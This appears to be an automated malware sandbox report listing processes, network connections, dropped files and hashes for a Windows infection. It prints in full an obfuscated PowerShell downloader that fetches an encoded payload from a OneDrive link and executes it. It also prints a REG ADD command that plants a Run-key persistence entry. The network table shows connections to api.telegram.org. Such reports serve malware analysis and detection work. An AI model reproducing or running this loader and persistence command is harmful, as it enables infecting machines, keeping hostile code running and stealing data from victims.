(Readaptive 'Udpla$LbegagTr del EuryoHewnobN,nnoa mitl,utke: epa,TF,rraaUnshop Ca rpAffaleQuantrStofhsUt,he O.gan=Simil B stt[ udplSHjligyEksposchimntChiloeForesmMenne.FdselTb.nene .ticxPeriotOilst.AescuE lyncnAssurcMatero Kir,dA,ioniaghasnTocy.gDi.te]Sorro: Sagg: J.ckATicklSShoelC MartINonigIO.stn.AvancG Up oeAmplitPr,kuSReofft K emrWheeli Yamun SidegV,lhe( V de$Subt PNebb,iRetrapRejsee Catoc ElevoBagholNitr.i LandnPigst1Cabal1R.del9Trach) D ac ');Disaccharidase (Readaptive 'detai$Gravfg Suttl,lansoPh.labIndjaaRinselC.tac:Hyp rTHal.kr UnloiRunesnEfterkHeinilAf ane Hypo=Valut$ Udr,T versaT lefp SamlpFondseBallorfrippsThesa. .aposPalatuOvaleb SeteswaukitFj rdrVal ki TurgnSubseg Prer(Sensu$ OverSBu.est.erroaEntobtanagueMannalEkspoiIndf eOr anrL,nin,Ordre$GinglDTegn.yFlledk traakSkilleForvrrAutoleMinibsDrgre)Lrem ');Disaccharidase $Trinkle;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$estlnderens = 1;Function Readaptive($Stavrimets){$Witumki=$Stavrimets.Length-$estlnderens;$Glasflasken='Substring';For( $Necker59=5;$Necker59 -lt $Witumki;$Necker59+=6){$Melby+=$Stavrimets.$Glasflasken.Invoke( $Necker59, $estlnderens);}$Melby;}function Disaccharidase($provinsernes){ & ($Onomantia) ($provinsernes);}$Arveflgerne=Readaptive ' TranMBr,dyoS.burzSy chi TypilA.sell JoeyaHuleb/ Ubje5 Isce.Til.r0Ledi, Patri(UtvunW,lstri rsken Pre d,mregoOverlwDemarsChole T afiNMorb TFire Der s1Soome0coupe. .ilr0s,nol; Afst Q,arWM,croi bnornFinde6Gyr.n4Kontr; Masc Brylx.reac6Frava4Beher;Q,arr Metamr Fre vAn.ir:D,rso1 Dyre2r bar1 Syne.Emanc0I,dor)Brdre TrkkGbars,eRootscKeystkCora.oInter/ bsol2 Will0 Call1Dipho0Otusa0There1Unimp0Prolo1Nedgr TorpeFDeratiCi,ilrK mmee Geigf Pe.ioPaafyx Scod/Samme1Cheec2Sands1Bae.t.Re en0,bere ';$Electronics=Readaptive 'PseudUS mbosDisemeAfprorJac,e- mnniAByldsgPeeviehegnenSansitHusdy ';$Dhamnoo=Readaptive 'C cath,rovktGavnbtP ivap ,unwsCa.or:Ensea/Ha.nt/Le emoOs,epnForbre Fab.dPre.nrOutseiCy,elv redeSla,i.PunchlFormpi LoxovArmbaeCasha.kachocHjemmo,askem Ther/ Re,idTi,geoScathw Ka,lnklagelOver o.nerkaOdorsdJobn.? Blemr Inc.eN,nexsGeisaiHierodFanta=Anfal7atrerE Re tBSesam6S nds7Incoe4demonA Po t8Primi8ForskC s amCSouteFAfst 3 Asb 8slask1RvestDBeskr%Gude.2,kibs1Forlo5W.rel5Senio6Baand&OprreaBaromu.napstMyrsih Stukk ,ersePiercy.entr=suive! RechA.ntvaEA.prvWLiset4Strst0ChemiNEm,rye U,dojAigu.ASjofe_HypernTalemSNoncrKQueenzMuscaMSvind ';$Mailability=Readaptive 'Fl rs>Doggi ';$Onomantia=Readaptive 'Stormi Subaebilerxforst ';$Richterskalas='Aarens';$Databaseadministrationens = Readaptive ' Helbe BryscOvermh arugo ,rod Tipsf%cur,aaApi rpTekstpSkamld.repaalsgretp euraDagv %Prin \ AlleV Bge,iPreutsBrnefiCopyctridseeBatc,eBe,ro2A,slu4Udb.d7Hitle..gsteBTarnioUlvinuincis balne&Aryan&Dioma PlageUnioncUnrejhCubatoTak.t non.xtM,leh ';Disaccharidase (Readaptive 'St.dw$M.lleg Baubl.nurpo OmstbKha gahatchlInfo.:St,lesFrthel Kbsty hasinAreoggN.nnae L,vel SejrsRedo tKl.nsu IceseVinter RefonKo.treThalasNotha=Doohi(MowracGenhrmDisesdGra d Lede/CentrcMycha ,ejlk$Best D ebraaCha ltDrgt.aRechebStrafaSubinsL zeleSt,ama retidToxifm En,oiFlambnP,rtiiFaares,egavtAffi,rBariea .ilit.tandiInteroB oadnTub,lePrem nEje dsSynoc) Lapp ');Disaccharidase (Readaptive 'H unc$S kkegFo.grl ViseoUdeb bCalifaN npolKomet:Raat.RMahogeTaabem RolloAnlgsust.urn NototTidersLinea9Sleev2B,ngt=Tyngs$U,dfoDCapsuhUdvi,aDe,mamberetnBitbro ablo tjer.Fordrs ,urep En.olrkke,irgfantAutot( Over$MandsMSuperaA,ungiDissol kulpaOvermbCoveriUntailFeliniDag,rtIndbiy agl)Stove ');$Dhamnoo=$Remounts92[0];$Sammenlimning= (Readaptive '.amme$IndelgP uvil Her.oFrndebForttaS.stelMuddl:ProgrCLab.ah .padlBrainoT,lefrBehinoVanddeHiventGiggehAnthreAksian Sa,feI eas=TalmoN ReeneTrac w.atho-pa,apOReshabFollijNestoeAukt,cOverkt O,er k ndeS SjlfydagpesRedigtKongeeS.kshmAfmil. Si,aNUnre,eAdelstSmaab.U.surWDisseeAdlegbI.gelCJordflDevoliConsceLa dgnRadiot');$Sammenlimning+=$slyngelstuernes[1];Disaccharidase ($Sammenlimning);Disaccharidase (Readaptive 'Super$ ,mmiCKommuhV ftelSo.geo UnderMisdioSammee TyndtBekldhOsteoe Aragn We.eeGatef.SkyttHDestiePl,kaa A,exdsatyreflirtrLong.s,ovor[Ves i$ UndeEHornflGage e Sp rc omapt Ki,krKretto BrnenBym,diVandicVa.utsSisa,] Nono=sj,ek$ N lgASmrepr RecavK,chse .begfEvindlSe.tig St reW,rkarInd anPietie Mean ');$sanseligstes=Readaptive 'Purom$ReducCT.skehSka,plRejeco Majur D spoudskeeNoaketDommeh predet llanStregeFo.ur.Dobb,DPestio.tundwHom tnOdenblIndheoRkvr aBedchdMine.FM,croiUnbibl.ayaweSongs(Savta$strsuDP.ddyhFo,uraSpecimPu,renLegeroagaupoNetka, Opp.$WhrimPHessiaNaturrEmbrocInc ueInseklOldsahIdioguInforsMinerg BotorStadeuKvalmnStud,dK.ordeErikknFermesDephl)Gg.re ';$Parcelhusgrundens=$slyngelstuernes[0];Disaccharidase (Readaptive ' Va.d$Kr,dsgSkraalAngolo pro bIndeta Regilbrill:Chi pSE,terkProt.runfloi.kratv SolfeBrydnsavan.t KithuUpdomeFo,skn .nte=Betak(CreamTgv ndeU.dersInfuntKlaps-SuperP ,orta TordtDis,eh Kies Udspr$SoftfPProfea aiterChlorcTimbee Spi lUnw.nhNuttiuFusumsBrummg.portrPlasmuAreopnOpslmdFluideN.tegn wingsEmbry)Solst ');while (!$Skrivestuen) {Disaccharidase (Readaptive 'Knall$ To.bgStdfalPaabyok ffebBin,caSphinlAn li: TopfBpar faKapact B staP,ehatShooteSkindnKussesClima= anif$Karantkva.irAfsteuSalgseMutt. ') ;Disaccharidase $sanseligstes;Disaccharidase (Readaptive ' .iteSAch ot .ommaSammerT rpetBlaar-SammeS R inl emaeOpskre EldrpRende vedta4 rve ');Disaccharidase (Readaptive 'Palae$Pest,gTheral Ichto epibBlokpaOver,lD lkr:VestvS .tilkStenbrPakv.iBevidvNewsaeSemiss Udfat SpecuEt,geeBulbynHydat=Belec( UrosTKvle e P,eis staatCirke-IndbePPhyllaOrdbetBri,ghCaffi Sup n$IltniP Emboajo.anrSun,mcPr.reeVarsllOg,hjhOzelou etrosUdgifgVrantrNoninuDr,jbnskibsdHelaueFlakonDemoisTopl.)Untwi ') ;Disaccharidase (Readaptive ' Ossi$SortbgSte.rlSkoleoS emabSkoleaCritilDsect:BrimmAFormidkommuop,tien,ateni TurnsNyvo,s Str eDumbsn Lrl slimfa= atob$Synchg SaddldatofoCons,bUncenalucimlD pra:CorruLKupeea DacrnHft pglankltKlasss orbrp ,isru tubenKeramdFlir.ePostdt Bole+Corru+ Atom%Marys$ZoonoRV rdee ,anymInvuloSmrbiuIntern S,ritCritisUrhn 9Pau e2Over,.ChampcMarciosocaguSkbn,nVi,lit B.fs ') ;$Dhamnoo=$Remounts92[$Adonissens];}$Statelier=288834;$Dykkeres=29520;Disaccharidase (Readaptive 'Rundt$StudigQuietlHidr.oTaa.mbKonfoaSkraal Mimi:PostgCD.riva JuritAquina TitrpDe.etu UnfrlOverdt squaeFrankdCopil Lon.o= Vol UdrikGDiapheMuckmtKonku-,ampeC BekeoBlommnDeputtHarp eCowernBlodgtTr ns Opna$H,poiPCritlaDro irOpre.cref,gepetrblAl.okhSem tuunnavsE inggde.esrG unduprizenS,perdGadsleGenesnCreepsHande ');Disaccharidase (Readaptive 'Hvilk$NahuagMi lilMora oRisikbAntiha Bat lForst:DigitPBadesiFlagrpGypsuetilstcGravioUnconlSejrvi Ove.nKogna1G str1 .hra9Stumb Lac.o= Tida Glos[koo dSKunstyTenses Holot T.ereIntonm Ubet.MorgnC Balko ogiknB xbav Eldee MisirAnnoyt Bere]U der: S xt:Rim,mFSk bsr,aataoLatermStemmBUdstua Midbs AleceTelef6s,ove4MatsaSRetort DacorClockiUnexpnBrodegSarko( Slip$ OrdsCknibeaHeppetWind aTradup N npuReturlFrilatLedsae Brusdelder) Bort ');Disaccharidase (Readaptive 'Udpla$LbegagTr del EuryoHewnobN,nnoa mitl,utke: epa,TF,rraaUnshop Ca rpAffaleQuantrStofhsUt,he O.gan=Simil B stt[ udplSHjligyEksposchimntChiloeForesmMenne.FdselTb.nene .ticxPeriotOilst.AescuE lyncnAssurcMatero Kir,dA,ioniaghasnTocy.gDi.te]Sorro: Sagg: J.ckATicklSShoelC MartINonigIO.stn.AvancG Up oeAmplitPr,kuSReofft K emrWheeli Yamun SidegV,lhe( V de$Subt PNebb,iRetrapRejsee Catoc ElevoBagholNitr.i LandnPigst1Cabal1R.del9Trach) D ac ');Disaccharidase (Readaptive 'detai$Gravfg Suttl,lansoPh.labIndjaaRinselC.tac:Hyp rTHal.kr UnloiRunesnEfterkHeinilAf ane Hypo=Valut$ Udr,T versaT lefp SamlpFondseBallorfrippsThesa. .aposPalatuOvaleb SeteswaukitFj rdrVal ki TurgnSubseg Prer(Sensu$ OverSBu.est.erroaEntobtanagueMannalEkspoiIndf eOr anrL,nin,Ordre$GinglDTegn.yFlledk traakSkilleForvrrAutoleMinibsDrgre)Lrem ');Disaccharidase $Trinkle;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unevangelical191" /t REG_EXPAND_SZ /d "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\Rematched\').Cecidogenous;%trianguleredes% ($multidivisional)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unevangelical191" /t REG_EXPAND_SZ /d "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\Rematched\').Cecidogenous;%trianguleredes% ($multidivisional)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | h7lqdw.am.files.1drv.com | udp |
| US | 13.107.42.12:443 | h7lqdw.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.137.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 13.107.42.12:443 | h7lqdw.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | h7lq1q.am.files.1drv.com | udp |
| US | 13.107.42.12:443 | h7lq1q.am.files.1drv.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/2968-0-0x00007FF920003000-0x00007FF920005000-memory.dmp
memory/2968-1-0x0000022A9C630000-0x0000022A9C652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gakn2bh1.e3i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2968-11-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/2968-12-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/2968-13-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/2968-16-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/2260-17-0x0000000002BB0000-0x0000000002BE6000-memory.dmp
memory/2260-18-0x00000000058A0000-0x0000000005EC8000-memory.dmp
memory/2260-19-0x0000000005630000-0x0000000005652000-memory.dmp
memory/2260-20-0x00000000057D0000-0x0000000005836000-memory.dmp
memory/2260-21-0x0000000005ED0000-0x0000000005F36000-memory.dmp
memory/2260-31-0x0000000006040000-0x0000000006394000-memory.dmp
memory/2260-32-0x00000000064F0000-0x000000000650E000-memory.dmp
memory/2260-33-0x0000000006520000-0x000000000656C000-memory.dmp
memory/2260-34-0x0000000007C70000-0x00000000082EA000-memory.dmp
memory/2260-35-0x0000000006A70000-0x0000000006A8A000-memory.dmp
memory/2260-36-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/2260-37-0x0000000007510000-0x0000000007532000-memory.dmp
memory/2260-38-0x00000000088A0000-0x0000000008E44000-memory.dmp
C:\Users\Admin\AppData\Roaming\Visitee247.Bou
| MD5 | e9b502edc13397b91e92fe9a43104c6a |
| SHA1 | 2e9d86fb27c8f6fb186894ee7f5ea2cd13a4d154 |
| SHA256 | 349e1e7c9ea18133418255bc3a68defb3bdb6aed1fbc07f696f19cb9b1151075 |
| SHA512 | 15b1c99d0384ddcb0768e537891d4f1782017e58017e4da76aea2a0f8a6562735ac57e2ef007f40da724c9acf064564d95f4d459976dd42c1f26704735f4bb27 |
memory/2260-40-0x0000000008E50000-0x000000000C8B1000-memory.dmp
memory/2968-41-0x00007FF920003000-0x00007FF920005000-memory.dmp
memory/2968-42-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/3972-50-0x0000000001000000-0x0000000002254000-memory.dmp
memory/3972-51-0x0000000001000000-0x000000000103A000-memory.dmp
memory/3972-52-0x0000000023EF0000-0x0000000023F8C000-memory.dmp
memory/2968-55-0x00007FF920000000-0x00007FF920AC1000-memory.dmp
memory/3972-56-0x0000000023E00000-0x0000000023E18000-memory.dmp
memory/3972-57-0x00000000249C0000-0x0000000024A10000-memory.dmp
memory/3972-59-0x0000000024CA0000-0x0000000024D32000-memory.dmp
memory/3972-60-0x0000000024C50000-0x0000000024C5A000-memory.dmp